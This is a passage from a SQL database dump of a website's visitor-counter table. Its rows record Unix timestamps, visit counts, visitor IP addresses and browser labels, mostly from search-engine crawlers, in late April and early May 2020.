'),(501701,1588234218,2,2,0,0,'157.55.39.251','other'),(501702,1588234815,1,0,1,0,'66.249.64.24',''),(501703,1588235002,3,3,0,0,'18.188.136.39','chrome'),(501704,1588235551,1,1,0,0,'178.49.245.144','chrome'),(501705,1588235777,1,1,0,0,'92.112.176.94','chrome'),(501706,1588235993,1,1,0,0,'157.55.39.42','other'),(501707,1588236729,1,1,0,0,'66.249.64.23','chrome'),(501708,1588237246,1,1,0,0,'157.55.39.42','other'),(501709,1588237454,1,1,0,0,'37.192.36.170','chrome'),(501710,1588237566,1,1,0,0,'157.55.39.50','other'),(501711,1588238383,1,1,0,0,'66.249.64.24','chrome'),(501712,1588238465,2,2,0,0,'157.55.39.251','other'),(501713,1588239307,8,8,0,0,'77.120.98.235','other'),(501714,1588240034,1,1,0,0,'91.196.178.166','chrome'),(501715,1588240224,1,1,0,0,'178.154.200.196','other'),(501716,1588240884,1,1,0,0,'95.158.53.3','chrome'),(501717,1588241601,1,1,0,0,'91.196.178.124','chrome'),(501718,1588241685,1,1,0,0,'3.235.95.97','chrome'),(501719,1588242083,2,2,0,0,'8.29.198.26','other'),(501720,1588242127,2,2,0,0,'66.249.64.25','chrome'),(501721,1588242899,1,1,0,0,'91.196.178.103','chrome'),(501722,1588243001,1,1,0,0,'46.118.122.16','chrome'),(501723,1588243085,1,1,0,0,'69.171.251.7','other'),(501724,1588243086,1,1,0,0,'69.171.251.10','other'),(501727,1588243087,1,1,0,0,'69.171.251.27','other'),(501729,1588243091,1,1,0,0,'178.154.200.220','other'),(501730,1588243227,1,1,0,0,'91.196.178.67','firefox'),(501731,1588243582,1,0,1,0,'157.55.39.50',''),(501732,1588243650,1,1,0,0,'193.107.110.30','chrome'),(501733,1588243739,1,1,0,0,'162.213.36.96','chrome'),(501734,1588244240,1,1,0,0,'66.249.64.24','chrome'),(501735,1588245104,1,1,0,0,'66.249.64.23','chrome'),(501736,1588245674,3,3,0,0,'66.249.64.25','chrome'),(501737,1588246193,1,1,0,0,'66.249.70.36','chrome'),(501738,1588246561,3,3,0,0,'157.55.39.251','other'),(501739,1588246571,1,1,0,0,'157.55.39.50','other'),(501740,1588247257,8,8,0,0,'77.120.98.235','other'),(501741,1588247920,1,1,0,0,'66.249.64.24','chrome'),(501742,1588248053,1,1,0,0,'109.74.154.72','chrome'),(501743,1588248567,1,1,0,0,'66.249.64.23','chrome'),(501744,1588248862,1,1,0,0,'157.55.39.251','other'),(501745,1588249282,1,1,0,0,'131.220.6.152','chrome'),(501746,1588249358,1,1,0,0,'91.196.178.25','chrome'),(501747,1588249485,1,1,0,0,'31.13.127.14','other'),(501748,1588249726,1,1,0,0,'66.249.64.25','chrome'),(501749,1588251560,1,1,0,0,'66.249.64.24','chrome'),(501750,1588252737,1,1,0,0,'37.73.216.109','chrome'),(501751,1588252942,2,2,0,0,'8.29.198.25','other'),(501752,1588253025,29,29,0,0,'51.89.201.9','chrome'),(501753,1588253166,1,1,0,0,'66.249.70.38','chrome'),(501754,1588253224,1,1,0,0,'66.249.64.24','chrome'),(501755,1588253525,1,1,0,0,'157.55.39.251','other'),(501756,1588254624,1,1,0,0,'91.196.178.79','firefox'),(501757,1588254761,1,1,0,0,'66.249.64.24','chrome'),(501758,1588254936,8,8,0,0,'77.120.98.235','other'),(501759,1588255325,1,1,0,0,'157.55.39.251','other'),(501760,1588256447,1,1,0,0,'217.131.105.147','other'),(501761,1588256454,1,1,0,0,'157.55.39.50','other'),(501762,1588257071,1,1,0,0,'66.249.64.25','chrome'),(501763,1588257148,1,1,0,0,'66.249.70.36','chrome'),(501764,1588257851,1,1,0,0,'66.249.64.23','chrome'),(501765,1588257927,1,1,0,0,'66.249.64.24','chrome'),(501766,1588260251,27,27,0,0,'198.50.246.236','other'),(501767,1588260339,1,1,0,0,'66.249.64.24','chrome'),(501768,1588260418,1,1,0,0,'157.55.39.251','other'),(501769,1588261310,1,1,0,0,'178.154.200.222','other'),(501770,1588261389,1,1,0,0,'157.55.39.50','other'),(501771,1588261451,1,1,0,0,'66.249.64.24','chrome'),(501772,1588261654,2,2,0,0,'157.55.39.251','other'),(501773,1588262296,2,2,0,0,'213.180.203.16','other'),(501774,1588262350,1,1,0,0,'178.154.200.222','other'),(501775,1588262421,8,8,0,0,'77.120.98.235','other'),(501776,1588263789,2,2,0,0,'8.29.198.26','other'),(501777,1588263868,1,1,0,0,'178.154.200.87','other'),(501778,1588264077,1,1,0,0,'66.249.70.33','chrome'),(501779,1588264255,1,1,0,0,'195.114.147.71','chrome'),(501780,1588264356,1,1,0,0,'213.180.203.16','other'),(501781,1588264494,1,1,0,0,'66.249.64.23','chrome'),(501782,1588264520,2,2,0,0,'178.154.200.222','other'),(501783,1588265319,1,1,0,0,'178.133.36.36','chrome'),(501784,1588265481,1,1,0,0,'178.154.200.222','other'),(501785,1588265581,1,1,0,0,'66.249.70.69','chrome'),(501786,1588265963,2,2,0,0,'157.55.39.251','other'),(501787,1588266169,1,1,0,0,'173.252.111.16','other'),(501788,1588266176,2,2,0,0,'157.55.39.169','other'),(501789,1588267105,1,1,0,0,'157.55.39.251','other'),(501790,1588267244,2,2,0,0,'178.154.200.222','other'),(501791,1588267277,1,1,0,0,'46.201.135.154','chrome'),(501792,1588267794,1,0,1,0,'66.249.70.69',''),(501793,1588268065,1,1,0,0,'213.180.203.16','other'),(501794,1588268124,1,0,1,0,'157.55.39.50',''),(501795,1588268223,1,1,0,0,'157.55.39.251','other'),(501796,1588268896,1,1,0,0,'37.73.110.176','chrome'),(501797,1588269156,1,1,0,0,'66.249.70.70','chrome'),(501798,1588269326,1,1,0,0,'66.249.70.72','chrome'),(501799,1588270346,8,8,0,0,'77.120.98.235','other'),(501800,1588270425,1,1,0,0,'178.154.200.222','other'),(501801,1588270921,1,0,1,0,'157.55.39.50',''),(501802,1588271273,1,1,0,0,'31.13.127.13','other'),(501803,1588271470,1,1,0,0,'46.219.221.157','chrome'),(501804,1588272013,1,1,0,0,'213.180.203.16','other'),(501805,1588272405,1,1,0,0,'66.249.70.69','chrome'),(501806,1588272809,2,2,0,0,'178.154.200.222','other'),(501807,1588273474,2,2,0,0,'66.249.70.70','chrome'),(501808,1588274633,1,1,0,0,'8.29.198.27','other'),(501809,1588274966,1,1,0,0,'157.55.39.251','other'),(501810,1588275069,1,1,0,0,'8.29.198.26','other'),(501811,1588276574,1,1,0,0,'66.249.64.33','chrome'),(501812,1588276782,3,3,0,0,'178.154.200.222','other'),(501813,1588278273,2,2,0,0,'66.249.70.72','chrome'),(501814,1588278275,8,8,0,0,'77.120.98.235','other'),(501815,1588278787,1,1,0,0,'66.249.70.70','chrome'),(501816,1588279116,2,2,0,0,'213.180.203.16','other'),(501817,1588279188,1,1,0,0,'66.249.64.36','chrome'),(501818,1588279319,2,2,0,0,'157.55.39.251','other'),(501819,1588280128,2,2,0,0,'157.55.39.169','other'),(501820,1588280757,1,1,0,0,'213.180.203.16','other'),(501821,1588280831,4,4,0,0,'134.122.54.200','chrome'),(501822,1588280891,1,1,0,0,'47.91.154.253','chrome'),(501823,1588281306,1,1,0,0,'66.249.70.72','chrome'),(501824,1588281611,1,1,0,0,'178.154.200.222','other'),(501825,1588281775,1,1,0,0,'66.249.70.69','chrome'),(501826,1588282539,1,1,0,0,'207.46.13.220','other'),(501827,1588283150,1,1,0,0,'157.55.39.251','other'),(501828,1588283581,1,1,0,0,'157.55.39.169','other'),(501829,1588283654,1,1,0,0,'66.249.64.36','chrome'),(501830,1588283880,1,1,0,0,'178.154.200.22','other'),(501831,1588284086,2,2,0,0,'178.154.200.222','other'),(501832,1588284380,1,1,0,0,'213.180.203.16','other'),(501833,1588285240,1,1,0,0,'66.249.64.33','chrome'),(501834,1588285476,1,1,0,0,'8.29.198.26','other'),(501835,1588285515,2,2,0,0,'213.180.203.16','other'),(501836,1588285520,1,1,0,0,'66.249.70.70','chrome'),(501837,1588285635,1,1,0,0,'66.249.70.69','chrome'),(501838,1588285862,8,8,0,0,'77.120.98.235','other'),(501839,1588285905,1,1,0,0,'8.29.198.25','other'),(501840,1588286213,2,2,0,0,'178.154.200.222','other'),(501841,1588286609,1,1,0,0,'157.55.39.169','other'),(501842,1588287718,1,1,0,0,'207.46.13.220','other'),(501843,1588288299,1,1,0,0,'66.249.70.72','chrome'),(501844,1588288518,1,1,0,0,'178.154.200.222','other'),(501845,1588288797,1,1,0,0,'157.55.39.251','other'),(501846,1588289041,4,4,0,0,'66.249.70.69','chrome'),(501847,1588289426,2,2,0,0,'66.249.70.70','chrome'),(501848,1588289467,1,1,0,0,'178.154.200.219','other'),(501849,1588290089,1,1,0,0,'207.46.13.220','other'),(501850,1588290148,1,1,0,0,'157.55.39.169','other'),(501851,1588290600,1,1,0,0,'157.55.39.251','other'),(501852,1588290907,1,1,0,0,'62.205.134.182','other'),(501853,1588291005,1,1,0,0,'66.249.64.33','chrome'),(501854,1588291185,2,2,0,0,'178.154.200.222','other'),(501855,1588291203,1,1,0,0,'66.249.70.69','chrome'),(501856,1588291329,1,1,0,0,'178.154.200.220','other'),(501857,1588291564,1,1,0,0,'66.249.70.70','chrome'),(501858,1588291714,1,1,0,0,'157.55.39.169','other'),(501859,1588291925,1,0,1,0,'207.46.13.220',''),(501860,1588292297,1,1,0,0,'207.46.13.220','other'),(501861,1588292782,1,1,0,0,'157.55.39.169','other'),(501862,1588293269,1,1,0,0,'178.154.200.220','other'),(501863,1588293537,8,8,0,0,'77.120.98.235','other'),(501864,1588293602,1,1,0,0,'207.46.13.220','other'),(501865,1588294324,2,2,0,0,'178.154.200.222','other'),(501866,1588294811,1,1,0,0,'157.55.39.251','other'),(501867,1588295264,3,3,0,0,'178.154.200.222','other'),(501868,1588295769,1,1,0,0,'178.154.200.236','other'),(501869,1588295915,1,1,0,0,'192.36.248.249','other'),(501870,1588296196,1,1,0,0,'178.154.200.220','other'),(501871,1588296305,4,4,0,0,'178.154.200.222','other'),(501872,1588296315,2,2,0,0,'8.29.198.26','other'),(501873,1588297054,1,1,0,0,'178.154.200.196','other'),(501874,1588297215,2,2,0,0,'178.154.200.222','other'),(501875,1588297262,1,1,0,0,'213.180.203.16','other'),(501876,1588297280,1,1,0,0,'178.154.200.92','other'),(501877,1588297671,1,1,0,0,'66.249.70.70','chrome'),(501878,1588298120,1,1,0,0,'157.55.39.251','other'),(501879,1588298219,1,1,0,0,'207.46.13.220','other'),(501880,1588298388,2,2,0,0,'178.154.200.222','other'),(501881,1588298867,1,1,0,0,'213.180.203.16','other'),(501882,1588299242,1,1,0,0,'207.46.13.220','other'),(501883,1588299687,1,1,0,0,'178.154.200.220','other'),(501884,1588299765,1,1,0,0,'66.249.70.70','chrome'),(501885,1588299887,2,2,0,0,'66.249.70.72','chrome'),(501886,1588299945,1,1,0,0,'66.249.64.36','chrome'),(501887,1588300248,1,1,0,0,'207.46.13.220','other'),(501888,1588300294,1,1,0,0,'178.154.200.196','other'),(501889,1588300868,1,1,0,0,'178.154.200.222','other'),(501890,1588300969,8,8,0,0,'77.120.98.235','other'),(501891,1588300990,1,1,0,0,'209.17.97.106','other'),(501892,1588301262,1,1,0,0,'66.249.64.36','chrome'),(501893,1588301567,1,1,0,0,'74.208.211.160','chrome'),(501894,1588301623,1,1,0,0,'157.55.39.251','other'),(501895,1588302534,1,1,0,0,'213.180.203.16','other'),(501896,1588302562,1,0,1,0,'66.249.70.69',''),(501897,1588302724,1,1,0,0,'66.249.70.72','chrome'),(501898,1588302760,1,1,0,0,'66.249.70.70','chrome'),(501899,1588303354,1,1,0,0,'207.46.13.220','other'),(501900,1588304255,1,1,0,0,'66.249.70.70','chrome'),(501901,1588304506,1,1,0,0,'157.55.39.251','other'),(501902,1588304819,1,1,0,0,'178.154.200.196','other'),(501903,1588304930,1,1,0,0,'193.106.30.99','firefox'),(501904,1588305777,1,1,0,0,'31.13.103.8','other'),(501905,1588306013,2,2,0,0,'178.154.200.222','other'),(501906,1588306348,1,1,0,0,'88.155.168.36','chrome'),(501907,1588306655,1,1,0,0,'5.44.169.215','chrome'),(501908,1588306678,1,1,0,0,'213.180.203.140','other'),(501909,1588307147,2,2,0,0,'8.29.198.26','other'),(501910,1588307867,1,1,0,0,'157.55.39.251','other'),(501911,1588308257,1,1,0,0,'62.205.134.182','other'),(501912,1588308511,1,1,0,0,'213.180.203.17','other'),(501913,1588308804,8,8,0,0,'77.120.98.235','other'),(501914,1588309051,3,3,0,0,'178.154.200.222','other'),(501915,1588309643,2,2,0,0,'157.55.39.251','other'),(501916,1588309653,1,1,0,0,'66.249.70.69','chrome'),(501917,1588310056,1,1,0,0,'178.154.200.222','other'),(501918,1588310083,1,1,0,0,'213.180.203.16','other'),(501919,1588310284,1,1,0,0,'207.46.13.220','other'),(501920,1588310331,1,1,0,0,'178.154.200.97','other'),(501921,1588310607,1,1,0,0,'213.180.203.142','other'),(501922,1588310764,1,1,0,0,'46.133.173.42','chrome'),(501923,1588311210,1,1,0,0,'178.154.200.222','other'),(501924,1588311625,1,1,0,0,'31.13.103.10','other'),(501925,1588311628,1,1,0,0,'31.13.103.18','other'),(501926,1588311629,1,1,0,0,'31.13.103.4','other'),(501927,1588311632,1,1,0,0,'31.13.103.17','other'),(501928,1588311668,1,1,0,0,'213.180.203.16','other'),(501929,1588312626,1,1,0,0,'178.154.200.222','other'),(501930,1588312910,1,1,0,0,'178.154.200.220','other'),(501931,1588313129,1,1,0,0,'213.180.203.16','other'),(501932,1588314706,1,1,0,0,'66.249.70.69','chrome'),(501933,1588314818,1,1,0,0,'213.180.203.16','other'),(501934,1588315198,1,1,0,0,'178.154.200.220','other'),(501935,1588316240,1,1,0,0,'66.249.70.69','chrome'),(501936,1588316427,1,1,0,0,'213.180.203.16','other'),(501937,1588316490,2,2,0,0,'178.154.200.222','other'),(501938,1588316603,1,1,0,0,'178.154.200.220','other'),(501939,1588316789,8,8,0,0,'77.120.98.235','other'),(501940,1588316977,1,1,0,0,'31.13.127.11','other'),(501941,1588317037,1,1,0,0,'213.180.203.142','other'),(501942,1588317218,3,3,0,0,'157.55.39.251','other'),(501943,1588317341,1,1,0,0,'66.249.70.72','chrome'),(501944,1588317531,3,3,0,0,'207.46.13.220','other'),(501945,1588317670,1,1,0,0,'157.55.39.169','other'),(501946,1588317758,1,1,0,0,'91.196.178.67','chrome'),(501947,1588317857,1,1,0,0,'178.154.200.87','other'),(501948,1588317978,2,2,0,0,'8.29.198.25','other'),(501949,1588318295,1,1,0,0,'178.154.200.222','other'),(501950,1588318726,1,1,0,0,'178.154.200.92','other'),(501951,1588319319,1,1,0,0,'213.180.203.109','other'),(501952,1588319376,1,1,0,0,'178.154.200.222','other'),(501953,1588320495,2,2,0,0,'173.252.111.17','other'),(501954,1588320496,1,1,0,0,'173.252.111.10','other'),(501957,1588320497,1,1,0,0,'173.252.111.19','other'),(501958,1588320615,1,1,0,0,'213.180.203.16','other'),(501959,1588321549,1,1,0,0,'173.252.111.10','other'),(501960,1588321551,1,1,0,0,'173.252.111.8','other'),(501961,1588321852,1,1,0,0,'178.154.200.220','other'),(501962,1588321918,1,1,0,0,'178.154.200.236','other'),(501963,1588322393,1,1,0,0,'66.249.64.36','chrome'),(501964,1588322685,3,3,0,0,'178.154.200.222','other'),(501965,1588322689,1,1,0,0,'207.46.13.220','other'),(501966,1588323313,1,1,0,0,'66.249.70.69','chrome'),(501967,1588323594,3,3,0,0,'178.154.200.222','other'),(501968,1588324768,8,8,0,0,'77.120.98.235','other'),(501969,1588325976,1,1,0,0,'178.154.200.222','other'),(501970,1588325984,1,1,0,0,'66.249.70.72','chrome'),(501971,1588326179,1,1,0,0,'213.180.203.16','other'),(501972,1588326512,1,1,0,0,'207.46.13.220','other'),(501973,1588326724,1,1,0,0,'66.249.64.36','chrome'),(501974,1588327090,1,0,1,0,'66.249.70.72',''),(501975,1588328121,1,1,0,0,'3.23.128.150','chrome'),(501976,1588328246,1,1,0,0,'178.154.200.236','other'),(501977,1588328464,1,1,0,0,'157.55.39.251','other'),(501978,1588328680,1,1,0,0,'213.180.203.16','other'),(501979,1588328732,1,1,0,0,'91.209.11.236','other'),(501980,1588328804,2,2,0,0,'8.29.198.25','other'),(501981,1588328817,1,1,0,0,'66.249.64.38','chrome'),(501982,1588329819,1,1,0,0,'213.180.203.16','other'),(501983,1588330326,1,1,0,0,'213.180.203.142','other'),(501984,1588330368,1,1,0,0,'207.46.13.220','other'),(501985,1588330388,1,0,1,0,'66.249.70.72',''),(501986,1588330871,1,1,0,0,'95.152.63.235','chrome'),(501987,1588331435,1,1,0,0,'207.46.13.220','other'),(501988,1588331565,1,1,0,0,'178.154.200.222','other'),(501989,1588331849,1,1,0,0,'66.249.70.69','chrome'),(501990,1588331917,1,1,0,0,'178.154.200.19','other'),(501991,1588332496,8,8,0,0,'77.120.98.235','other'),(501992,1588332796,1,1,0,0,'207.46.13.220','other'),(501993,1588332810,4,4,0,0,'157.55.39.251','other'),(501994,1588333265,1,1,0,0,'178.154.200.222','other'),(501995,1588333689,1,1,0,0,'66.249.70.72','chrome'),(501996,1588333755,1,1,0,0,'207.46.13.220','other'),(501997,1588333943,1,1,0,0,'178.154.200.92','other'),(501998,1588333948,1,1,0,0,'66.249.70.69','chrome'),(501999,1588334216,1,1,0,0,'157.55.39.251','other'),(502000,1588334573,1,1,0,0,'109.74.154.72','chrome'),(502001,1588334718,1,1,0,0,'178.154.200.97','other'),(502002,1588335079,1,1,0,0,'66.249.70.72','chrome'),(502003,1588335667,1,1,0,0,'178.154.200.222','other'),(502004,1588335711,1,1,0,0,'66.249.70.69','chrome'),(502005,1588336107,2,2,0,0,'66.249.70.72','chrome'),(502006,1588336125,2,2,0,0,'66.249.70.70','chrome'),(502007,1588336187,3,3,0,0,'157.55.39.251','other'),(502008,1588336217,1,1,0,0,'79.137.130.30','chrome'),(502009,1588336837,1,1,0,0,'178.154.200.222','other'),(502010,1588337179,1,1,0,0,'193.106.30.99','firefox'),(502011,1588337462,1,1,0,0,'89.72.62.122','chrome'),(502012,1588337488,1,1,0,0,'178.154.200.245','other'),(502013,1588337545,1,1,0,0,'207.46.13.180','other'),(502014,1588338065,1,1,0,0,'31.13.127.4','other'),(502015,1588338325,1,1,0,0,'207.46.13.90','other'),(502016,1588339019,1,1,0,0,'69.171.251.9','other'),(502017,1588339020,1,1,0,0,'69.171.251.5','other'),(502018,1588339524,2,2,0,0,'178.154.200.222','other'),(502019,1588339596,1,1,0,0,'66.249.70.72','chrome'),(502020,1588339647,1,1,0,0,'8.29.198.27','other'),(502021,1588339926,1,1,0,0,'207.46.13.220','other'),(502022,1588340039,1,1,0,0,'134.122.53.221','other'),(502023,1588340079,1,1,0,0,'8.29.198.25','other'),(502024,1588340426,2,2,0,0,'66.249.70.69','chrome'),(502025,1588340621,2,2,0,0,'178.154.200.222','other'),(502026,1588340624,4,4,0,0,'66.249.70.70','chrome'),(502027,1588340625,2,2,0,0,'207.46.13.180','other'),(502028,1588340672,8,8,0,0,'77.120.98.235','other'),(502029,1588340842,2,2,0,0,'207.46.13.90','other'),(502030,1588341003,1,1,0,0,'66.249.70.72','chrome'),(502031,1588341019,1,1,0,0,'131.220.6.152','chrome'),(502032,1588341710,1,1,0,0,'46.211.40.16','chrome'),(502033,1588342037,2,2,0,0,'213.180.203.16','other'),(502034,1588342081,1,1,0,0,'207.46.13.90','other'),(502035,1588343725,2,2,0,0,'207.46.13.220','other'),(502036,1588344083,1,1,0,0,'207.46.13.90','other'),(502037,1588345206,1,1,0,0,'66.249.70.70','chrome'),(502038,1588345331,2,2,0,0,'178.154.200.222','other'),(502039,1588345353,1,1,0,0,'66.249.70.72','chrome'),(502040,1588345497,2,2,0,0,'207.46.13.90','other'),(502041,1588345583,1,1,0,0,'213.180.203.17','other'),(502042,1588346110,1,1,0,0,'66.249.64.36','chrome'),(502043,1588346711,1,1,0,0,'178.154.200.222','other'),(502044,1588347860,1,1,0,0,'66.249.64.36','chrome'),(502045,1588348310,1,1,0,0,'213.180.203.16','other'),(502046,1588348574,2,2,0,0,'207.46.13.90','other'),(502047,1588348610,8,8,0,0,'77.120.98.235','other'),(502048,1588348844,1,1,0,0,'207.46.13.180','other'),(502049,1588350077,1,1,0,0,'207.46.13.90','other'),(502050,1588350222,1,1,0,0,'66.249.70.72','chrome'),(502051,1588350365,2,2,0,0,'178.154.200.222','other'),(502052,1588350491,2,2,0,0,'8.29.198.25','other'),(502053,1588350754,1,1,0,0,'66.249.70.70','chrome'),(502054,1588351034,3,3,0,0,'3.21.248.208','chrome'),(502055,1588351477,1,1,0,0,'207.46.13.90','other'),(502056,1588352016,2,2,0,0,'178.154.200.222','other'),(502057,1588352083,1,1,0,0,'66.249.70.70','chrome'),(502058,1588352142,1,1,0,0,'76.71.84.8','chrome'),(502059,1588352487,1,1,0,0,'207.46.13.180','other'),(502060,1588353363,3,3,0,0,'207.46.13.90','other'),(502061,1588353930,1,1,0,0,'157.55.39.190','other'),(502062,1588354168,1,1,0,0,'207.46.13.180','other'),(502063,1588355238,1,1,0,0,'66.249.70.70','chrome'),(502064,1588355467,1,1,0,0,'178.154.200.222','other'),(502065,1588355479,1,1,0,0,'207.46.13.90','other'),(502066,1588356308,1,1,0,0,'66.249.70.72','chrome'),(502067,1588356331,8,8,0,0,'77.120.98.235','other'),(502068,1588356750,1,1,0,0,'207.46.13.90','other'),(502069,1588357024,1,1,0,0,'178.133.129.123','chrome'),(502070,1588357732,1,1,0,0,'66.249.70.69','chrome'),(502071,1588357842,1,1,0,0,'178.154.200.222','other'),(502072,1588358829,1,1,0,0,'176.15.40.146','chrome'),(502073,1588360700,1,1,0,0,'207.46.13.90','other'),(502074,1588361328,1,1,0,0,'8.29.198.26','other'),(502075,1588361749,1,1,0,0,'8.29.198.25','other'),(502076,1588362762,1,1,0,0,'66.249.70.69','chrome'),(502077,1588362819,1,1,0,0,'157.55.39.190','other'),(502078,1588363900,1,1,0,0,'207.46.13.90','other'),(502079,1588365267,2,2,0,0,'157.55.39.212','other'),(502080,1588365270,1,1,0,0,'66.249.70.69','chrome'),(502081,1588365353,8,8,0,0,'77.120.98.235','other'),(502082,1588366153,1,1,0,0,'178.133.43.5','chrome'),(502083,1588366866,1,1,0,0,'66.249.70.69','chrome'),(502084,1588368165,2,2,0,0,'207.46.13.90','other'),(502085,1588368248,1,1,0,0,'207.46.13.180','other'),(502086,1588368939,1,1,0,0,'173.252.111.24','other'),(502087,1588368940,1,1,0,0,'173.252.111.13','other'),(502088,1588369396,1,1,0,0,'207.46.13.90','other'),(502089,1588371090,1,1,0,0,'207.46.13.180','other'),(502090,1588372159,1,1,0,0,'8.29.198.27','other'),(502091,1588372356,1,1,0,0,'157.55.39.190','other'),(502092,1588372490,1,1,0,0,'157.55.39.212','other'),(502093,1588372582,1,1,0,0,'8.29.198.26','other'),(502094,1588372972,8,8,0,0,'77.120.98.235','other'),(502095,1588373568,1,1,0,0,'157.55.39.212','other'),(502096,1588374693,1,1,0,0,'207.46.13.90','other'),(502097,1588375182,1,1,0,0,'157.55.39.197','other'),(502098,1588375865,1,1,0,0,'66.249.64.36','chrome'),(502099,1588376496,1,1,0,0,'66.249.70.70','chrome'),(502100,1588376744,1,1,0,0,'207.46.13.90','other'),(502101,1588377309,1,1,0,0,'62.205.134.182','other'),(502102,1588377949,1,1,0,0,'157.55.39.197','other'),(502103,1588379143,1,1,0,0,'66.249.70.70','chrome'),(502104,1588379277,1,1,0,0,'207.46.13.180','other'),(502105,1588379501,1,1,0,0,'69.171.251.10','other'),(502106,1588379502,2,2,0,0,'69.171.251.34','other'),(502110,1588379503,1,1,0,0,'69.171.251.15','other'),(502111,1588380476,8,8,0,0,'77.120.98.235','other'),(502112,1588380530,1,1,0,0,'66.249.70.72','chrome'),(502113,1588380603,2,2,0,0,'157.55.39.212','other'),(502114,1588380995,1,1,0,0,'157.55.39.197','other'),(502115,1588381632,1,1,0,0,'51.77.52.160','chrome'),(502116,1588382054,3,3,0,0,'66.249.70.69','chrome'),(502117,1588382106,2,2,0,0,'66.249.70.70','chrome'),(502118,1588382108,2,2,0,0,'66.249.70.72','chrome'),(502119,1588382725,1,1,0,0,'54.200.209.165','other'),(502120,1588382984,1,1,0,0,'8.29.198.25','other'),(502121,1588383201,3,3,0,0,'157.55.39.212','other'),(502122,1588383414,1,1,0,0,'8.29.198.26','other'),(502123,1588384078,1,1,0,0,'207.46.13.90','other'),(502124,1588384522,1,1,0,0,'66.249.70.72','chrome'),(502125,1588385250,1,1,0,0,'66.249.64.33','chrome'),(502126,1588385475,2,2,0,0,'66.249.70.72','chrome'),(502127,1588386192,1,1,0,0,'207.46.13.90','other'),(502128,1588387249,1,1,0,0,'157.55.39.197','other'),(502129,1588387409,1,1,0,0,'66.249.64.38','chrome'),(502130,1588387564,1,1,0,0,'157.55.39.212','other'),(502131,1588389308,1,1,0,0,'207.46.13.180','other'),(502132,1588389589,8,8,0,0,'77.120.98.235','other'),(502133,1588389871,1,1,0,0,'66.249.70.70','chrome'),(502134,1588390097,1,1,0,0,'207.46.13.90','other'),(502135,1588390650,1,1,0,0,'66.249.64.36','chrome'),(502136,1588392481,4,4,0,0,'157.55.39.197','other'),(502137,1588392709,1,1,0,0,'66.249.70.69','chrome'),(502138,1588393813,1,1,0,0,'8.29.198.27','other'),(502139,1588394103,1,1,0,0,'66.249.70.72','chrome'),(502140,1588394115,4,4,0,0,'66.249.70.70','chrome'),(502141,1588394129,2,2,0,0,'66.249.70.69','chrome'),(502142,1588394248,1,1,0,0,'8.29.198.25','other'),(502143,1588394700,1,1,0,0,'62.205.134.182','other'),(502144,1588397184,8,8,0,0,'77.120.98.235','other'),(502145,1588397456,1,1,0,0,'66.249.70.69','chrome'),(502146,1588399427,1,1,0,0,'66.249.70.69','chrome'),(502147,1588399776,1,1,0,0,'207.46.13.90','other'),(502148,1588401582,1,1,0,0,'178.154.200.222','other'),(502149,1588402445,1,1,0,0,'207.46.13.76','other'),(502150,1588402870,2,2,0,0,'66.249.70.72','chrome'),(502151,1588402883,1,1,0,0,'66.249.70.69','chrome');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (502152,1588402934,1,1,0,0,'66.249.70.70','chrome'),(502153,1588403073,1,1,0,0,'178.154.200.222','other'),(502154,1588403399,1,1,0,0,'91.196.178.25','chrome'),(502155,1588404191,2,2,0,0,'66.249.70.69','chrome'),(502156,1588404433,1,1,0,0,'178.154.200.220','other'),(502157,1588404640,1,1,0,0,'8.29.198.25','other'),(502158,1588404951,2,2,0,0,'66.249.70.70','chrome'),(502159,1588405076,1,1,0,0,'8.29.198.27','other'),(502160,1588405083,1,1,0,0,'66.249.70.72','chrome'),(502161,1588405381,1,1,0,0,'138.246.253.15','chrome'),(502162,1588405648,1,1,0,0,'209.17.97.74','other'),(502163,1588405658,1,1,0,0,'66.249.64.36','chrome'),(502164,1588405807,8,8,0,0,'77.120.98.235','other'),(502165,1588406243,1,1,0,0,'91.209.11.236','other'),(502166,1588406537,1,1,0,0,'66.249.70.69','chrome'),(502167,1588406577,2,2,0,0,'207.46.13.90','other'),(502168,1588406601,1,1,0,0,'66.249.70.72','chrome'),(502169,1588406691,1,1,0,0,'207.46.13.76','other'),(502170,1588406696,2,2,0,0,'157.55.39.167','other'),(502171,1588406851,1,1,0,0,'178.154.200.222','other'),(502172,1588407651,1,1,0,0,'213.180.203.16','other'),(502173,1588407811,1,1,0,0,'17.58.101.26','other'),(502174,1588408408,4,4,0,0,'66.249.70.70','chrome'),(502175,1588408571,1,1,0,0,'66.249.70.72','chrome'),(502176,1588409910,1,1,0,0,'178.154.200.222','other'),(502177,1588410756,1,1,0,0,'66.249.70.69','chrome'),(502178,1588411660,1,1,0,0,'66.249.70.69','chrome'),(502179,1588411673,1,1,0,0,'66.249.70.70','chrome'),(502180,1588411943,1,1,0,0,'91.196.178.37','chrome'),(502181,1588412377,1,1,0,0,'66.249.64.36','chrome'),(502182,1588412637,1,1,0,0,'207.46.13.76','other'),(502183,1588412766,1,1,0,0,'66.249.70.69','chrome'),(502184,1588413081,1,1,0,0,'91.196.178.166','chrome'),(502185,1588413215,1,1,0,0,'51.158.190.214','firefox'),(502186,1588413568,3,3,0,0,'178.154.200.222','other'),(502187,1588413833,1,1,0,0,'66.249.70.70','chrome'),(502188,1588413902,1,1,0,0,'178.154.200.119','other'),(502189,1588414668,8,8,0,0,'77.120.98.235','other'),(502190,1588415159,1,1,0,0,'178.154.200.222','other'),(502191,1588415194,1,1,0,0,'213.180.203.16','other'),(502192,1588415291,1,1,0,0,'207.46.13.76','other'),(502193,1588415418,2,2,0,0,'207.46.13.90','other'),(502194,1588415463,1,1,0,0,'8.29.198.26','other'),(502195,1588415903,1,1,0,0,'8.29.198.27','other'),(502196,1588415981,1,1,0,0,'173.252.111.5','other'),(502197,1588415982,1,1,0,0,'173.252.111.17','other'),(502198,1588416168,1,1,0,0,'157.55.39.167','other'),(502199,1588417002,1,1,0,0,'66.249.70.70','chrome'),(502200,1588417170,1,1,0,0,'66.249.70.72','chrome'),(502201,1588418220,1,1,0,0,'66.249.64.36','chrome'),(502202,1588418385,1,1,0,0,'207.46.13.90','other'),(502203,1588418723,1,1,0,0,'66.249.70.70','chrome'),(502204,1588418805,1,1,0,0,'178.154.200.236','other'),(502205,1588419263,1,1,0,0,'66.249.70.72','chrome'),(502206,1588419276,3,3,0,0,'66.249.70.69','chrome'),(502207,1588419739,1,1,0,0,'109.74.154.72','chrome'),(502208,1588419853,1,1,0,0,'207.46.13.90','other'),(502209,1588421058,1,1,0,0,'66.249.70.70','chrome'),(502210,1588421567,1,1,0,0,'157.55.39.167','other'),(502211,1588421572,4,4,0,0,'207.46.13.90','other'),(502212,1588421577,1,1,0,0,'207.46.13.76','other'),(502213,158